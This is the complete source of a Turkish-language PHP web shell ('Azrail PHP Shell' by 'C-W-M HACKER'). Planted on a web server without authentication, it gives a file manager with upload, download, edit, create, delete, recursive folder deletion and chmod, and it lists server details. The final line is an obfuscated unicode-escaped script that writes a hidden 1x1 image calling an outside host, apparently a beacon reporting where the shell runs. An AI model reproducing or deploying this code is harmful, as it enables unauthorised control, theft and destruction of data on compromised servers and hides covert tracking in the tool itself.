[ + ] Azrail PHP Shell [ + ]

1. <?php
2. $default=$DOCUMENT_ROOT;
3. $this_file="./azrailphp.php";
4.  
5. if(isset($save)){
6. $fname=str_replace(" ","_",$fname);
7. $fname=str_replace("%20","_",$fname);
8. header("Cache-control: private");
9. header("Content-type: application/force-download");
10. header("Content-Length: ".filesize($save));
11. header("Content-Disposition: attachment; filename=$fname");
12.  
13. $fp = fopen($save, 'r');
14. fpassthru($fp);
15. fclose($fp);
16. unset($save);
17. exit;
18. }
19.  
20. if ( function_exists('ini_get') ) {
21.         $onoff = ini_get('register_globals');
22. } else {
23.         $onoff = get_cfg_var('register_globals');
24. }
25. if ($onoff != 1) {
26.         @extract($_POST, EXTR_SKIP);
27.         @extract($_GET, EXTR_SKIP);
28. }
29.  
30.  
31. function deltree($deldir) {
32.         $mydir=@dir($deldir);
33.         while($file=$mydir->read())        {
34.                 if((is_dir("$deldir/$file")) AND ($file!=".") AND ($file!="..")) {
35.                         @chmod("$deldir/$file",0777);
36.                         deltree("$deldir/$file");
37.                 }
38.                 if (is_file("$deldir/$file")) {
39.                         @chmod("$deldir/$file",0777);
40.                         @unlink("$deldir/$file");
41.                 }
42.         }
43.         $mydir->close();
44.         @chmod("$deldir",0777);
45.         echo @rmdir($deldir) ? "<center><b><font color='#0000FF'>SÝLÝNDÝ:$deldir/$file</b></font></center>" : "<center><font color=\"#ff0000\">Silinemedi:$deldir/$file</font></center>";
46.         }
47.  
48. if ($op=='phpinfo'){
49. $fonk_kap = get_cfg_var("fonksiyonlarý_kapat");
50.         echo $phpinfo=(!eregi("phpinfo",$fonk_kapat)) ? phpinfo() : "<center>phpinfo() Komutu Çalýþmýyiii</center>";
51.         exit;
52. }
53.  
54.  
55. echo "<html>
56.      <head>
57.             <title>azrail 1.0 by C-W-M</title>
58.      </head>
59.  
60.       <body bgcolor='#000000' text='#008000' link='#00FF00' vlink='#00FF00' alink='#00FF00'>
61.       </body>";
62.  
63. echo "<center><font size='+3' color='#FF0000'><b> aZRaiLPhp v1.0!!!</b></font></center><br>
64.      <center><font size='+2' color='#FFFFFF'>C-W-M</font><font size='+2' color='#FF0000'>HACKER</font><br>
65.      <br>";
66. echo "<center><a href='./$this_file?op=phpinfo' target='_blank'>PHP INFO</a></center>";
67. echo "<br>
68.      <br>";
69.  
70. echo "--------------------------------------------------------------------------------------------------------------------------------------------------------------------";
71. echo "<div align=center>
72.      <font size='+1' color='#0000FF'>Root Klasör: $DOCUMENT_ROOT</font><br>
73.      <font size='+1'color='#0000FF'>aZRaiLPhP'nin URL'si: http://$HTTP_HOST$REDIRECT_URL</font> <form method=post action=$this_file>";
74.  
75. if(!isset($dir)){
76. $dir="$default";
77. }
78. echo "<input type=text size=60 name=dir value='$dir'>
79. <input type=submit value='GIT'><br>
80. </form>
81. </div>";
82.  
83. if ($op=='up'){
84.         $path=dir;
85.         echo "<br><br><center><font size='+1' color='#FF0000'><b>DOSYA GONDERME</b></font></center><br>";
86. if(isset($dosya_gonder)) {
87.  
88. if (copy ( $dosya_gonder, "$dir/$dosya_gonder_name" )){
89.     echo "<center><font color='#0000FF'>Dosya Baþarýyla Gönderildi</font></center>";
90. }
91. } elseif(empty($dosya_gonder)) {
92. $path=$dir;
93. $dir = $dosya_dizin;
94. echo "$dir";
95. echo "<FORM  ENCTYPE='multipart/form-data' ACTION='$this_file?op=up&dir=$path' METHOD='POST'>";
96. echo "<center><INPUT TYPE='file' NAME='dosya_gonder'></center><br>";
97.  
98. echo "<br><center><INPUT TYPE='SUBMIT' NAME='dy' VALUE='Dosya Yolla!'></center>";
99. echo "</form>";
100.  
101.  
102. echo "</html>";
103. } else {
104. die ("<center><font color='#FF0000'>Dosya kopyalanamýyor!</font><center>");
105. }
106. }
107.  
108. if($op=='mf'){
109.     $path=$dir;
110.     if(isset($dismi) && isset($kodlar)){
111.                 $ydosya="$path/$dismi";
112.                 if(file_exists("$path/$dismi")){
113.                         $dos= "Böyle Bir Dosya Vardý Üzerine Yazýldý";
114.                 } else {
115.                         $dos = "Dosya Oluþturuldu";
116.                 }
117.                 touch ("$path/$dismi") or die("Dosya Oluþturulamýyor");
118.                 $ydosya2 = fopen("$ydosya", 'w') or die("Dosya yazmak için açýlamýyor");
119.                 fwrite($ydosya2, $kodlar) or die("Dosyaya yazýlamýyor");
120.                 fclose($ydosya2);
121.                 echo "<center><font color='#0000FF'>$dos</font></center>";
122.         } else {
123.  
124.         echo "<FORM METHOD='POST' ACTION='$this_file?op=mf&dir=$path'>";
125.         echo "<center>Dosya Ýsmi :<input type='text' name='dismi'></center><br>";
126.     echo "<br>";
127.     echo "<center>KODLAR</center><br>";
128.     echo "<center><TEXTAREA NAME='kodlar' ROWS='19' COLS='52'></TEXTAREA></center>";
129.         echo "<center><INPUT TYPE='submit' name='okmf' value='TAMAM'></center>";
130.     echo "</form>";
131.         }
132. }
133.  
134. if($op=='md'){
135.         $path=$dir;
136.         if(isset($kismi) && isset($okmf)){
137.                 $klasör="$path/$kismi";
138.                 mkdir("$klasör", 0777) or die ("<center><font color='#0000FF'>Klasör Oluþturulamýyor</font></center>");
139.                 echo "<center><font color='#0000FF'>Klasör Oluþturuldu</font></center>";
140.         }
141.  
142.         echo "<FORM METHOD='POST' ACTION='$this_file?op=md&dir=$path'>";
143.         echo "<center>Klasör Ýsmi :<input type='text' name='kismi'></center><br>";
144.         echo "<br>";
145.         echo "<center><INPUT TYPE='submit' name='okmf' value='TAMAM'></center>";
146.         echo "</form>";
147. }
148.  
149.  
150. if($op=='del'){
151. unlink("$fname");
152. }
153.  
154.  
155. if($op=='dd'){
156.         $dir=$here;
157.                 $deldirs=$yol;
158.                 if(!file_exists("$deldirs")) {
159.                         echo "<font color=\"#ff0000\">Dosya Yok</font>";
160.                 } else {
161.                         deltree($deldirs);
162.                 }
163. }
164.  
165.  
166.  
167. if($op=='edit'){
168. $yol=$fname;
169. $yold=$path;
170. if (isset($ok)){
171. $dosya = fopen("$yol", 'w') or die("Dosya Açýlamýyor");
172. $metin=$tarea;
173. fwrite($dosya, $metin) or die("Yazýlamýyor!");
174. fclose($dosya);
175. echo "<center><font color='#0000FF'Dosya Baþarýyla Düzenlendi</font></center>";
176. } else {
177. $path=$dir;
178. echo "<center>DÜZENLE: $yol</center>";
179. $dosya = fopen("$yol", 'r') or die("<center><font color='#FF0000'Dosya Açýlamýyor</font></center>");
180. $boyut=filesize($yol);
181. $duzen = @fread ($dosya, $boyut);
182. echo "<form method=post action=$this_file?op=edit&fname=$yol&dir=$path>";
183. echo "<center><TEXTAREA style='WIDTH: 476px; HEIGHT: 383px' name=tarea rows=19 cols=52>$duzen</TEXTAREA></center><br>";
184. echo "<center><input type='Submit' value='TAMAM' name='ok'></center>";
185. fclose($dosya);
186. $duzen=htmlspecialchars($duzen);
187. echo "</form>";
188. }
189. }
190.  
191. if($op=='efp2'){
192. $fileperm=base_convert($_POST['fileperm'],8,10);
193.         echo $msg=@chmod($dir."/".$dismi2,$fileperm) ? "<font color='#0000FF'><b>$dismi2 ÝSÝMLÝ DOSYANIN</font></b>" : "<font color=\"#ff0000\">DEÝÞTÝRÝLEMEDÝ!!</font>";
194.         echo " <font color='#0000FF'>CHMODU ".substr(base_convert(@fileperms($dir."/".$dismi2),10,8),-4)." OLARAK DEÝÞTÝRÝLDÝ</font>";
195. }
196.  
197. if($op=='efp'){
198. $izinler2=substr(base_convert(@fileperms($fname),10,8),-4);
199. echo "<form method=post action=./$this_file?op=efp2>
200.      <div align=center><input name='dismi2' type='text' value='$dismi' class='input' readonly>CHMOD:
201.      <input type='text' name='fileperm' size='20' value='$izinler2' class='input'>
202.      <input name='dir' type='hidden' value='$yol'>
203.      <input type='submit' value='TAMAM' class='input'></div><br>
204.      </form>";
205.  
206. }
207.  
208.  
209. $path=$dir;
210. if(isset($dir)){
211. if ($dir = @opendir("$dir")) {
212. while (($file = readdir($dir)) !== false) {
213. if($file!="." && $file!=".."){
214. if(is_file("$path/$file")){
215. $disk_space=filesize("$path/$file");
216. $kb=$disk_space/1024;
217. $total_kb = number_format($kb, 2, '.', '');
218. $total_kb2="Kb";
219.  
220.  
221. echo "<div align=right><font face='arial' size='2' color='#C0C0C0'><b> $file</b></font> - <a href='./$this_file?save=$path/$file&fname=$file'>indir</a> - <a href='./$this_file?op=edit&fname=$path/$file&dir=$path'>düzenle</a> - ";
222. echo "<a href='./$this_file?op=del&fname=$path/$file&dir=$path'>sil</a> - <b>$total_kb$total_kb2</b> - ";
223. @$fileperm=substr(base_convert(fileperms("$path/$file"),10,8),-4);
224. echo "<a href='./$this_file?op=efp&fname=$path/$file&dismi=$file&yol=$path'><font color='#FFFF00'>$fileperm</font></a>";
225. echo "<br></div>\n";
226. }else{
227. echo "<div align=left><a href='./$this_file?dir=$path/$file'>GÝT></a> <font face='arial' size='3' color='#808080'> $path/$file</font> - <b>DIR</b> - <a href='./$this_file?op=dd&yol=$path/$file&here=$path'>Sil</a> - ";
228. $dirperm=substr(base_convert(fileperms("$path/$file"),10,8),-4);
229. echo "<font color='#FFFF00'>$dirperm</font>";
230. echo " <br></div>\n";
231.  
232. }
233. }
234. }
235. closedir($dir);
236. }
237. }
238.  
239.  
240.  
241.  
242.  
243. echo "<center><a href='./$this_file?dir=$DOCUMENT_ROOT'>Root Klasörüne Git</a></center>";
244. if(file_exists("B:\\")){
245. echo "<center><a href='./$this_file?dir=B:\\'>B:\\</a></center>";
246. } else {}
247. if(file_exists("C:\\")){
248. echo "<center><a href='./$this_file?dir=C:\\'>C:\\</a></center>";
249. } else {}
250. if (file_exists("D:\\")){
251.  echo "<center><a href='./$this_file?dir=D:\\'>D:\\</a></center>";
252. } else {}
253. if (file_exists("E:\\")){
254.  echo "<center><a href='./$this_file?dir=E:\\'>E:\\</a></center>";
255. } else {}
256. if (file_exists("F:\\")){
257.  echo "<center><a href='./$this_file?dir=F:\\'>F:\\</a></center>";
258. } else {}
259. if (file_exists("G:\\")){
260.  echo "<center><a href='./$this_file?dir=G:\\'>G:\\</a></center>";
261. } else {}
262. if (file_exists("H:\\")){
263.  echo "<center><a href='./$this_file?dir=H:\\'>H:\\</a></center>";
264. } else {}
265.  
266.  
267. echo "--------------------------------------------------------------------------------------------------------------------------------------------------------------------";
268. echo "<center><font size='+1' color='#FF0000'><b>SERVER BÝLGÝLERÝ</b></font><br></center>";
269. echo "<br><u><b>$SERVER_SIGNATURE</b></u>";
270. echo "<b><u>Software</u>: $SERVER_SOFTWARE</b><br>";
271. echo "<b><u>Server IP</u>: $SERVER_ADDR</b><br>";
272. echo "<br>";
273. echo "--------------------------------------------------------------------------------------------------------------------------------------------------------------------";
274. echo "<center><font size='+1' color='#FF0000'><b>ÝÞLEMLER</b></font><br></center>";
275. echo "<br><center><font size='4'><a href='$this_file?op=up&dir=$path'>Dosya Gönder</a></font></center>";
276. echo "<br><center><font size='4'><a href='$this_file?op=mf&dir=$path'>Dosya Oluþtur</a></font></center>";
277. echo "<br><center><font size='4'><a href='$this_file?op=md&dir=$path'>Klasör Oluþtur</a></font></center>";
278. echo "--------------------------------------------------------------------------------------------------------------------------------------------------------------------";
279. echo "<center>Tüm haklarý sahibi  C-W-M'ye aittir</center><br>";
280. ?>
281. <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>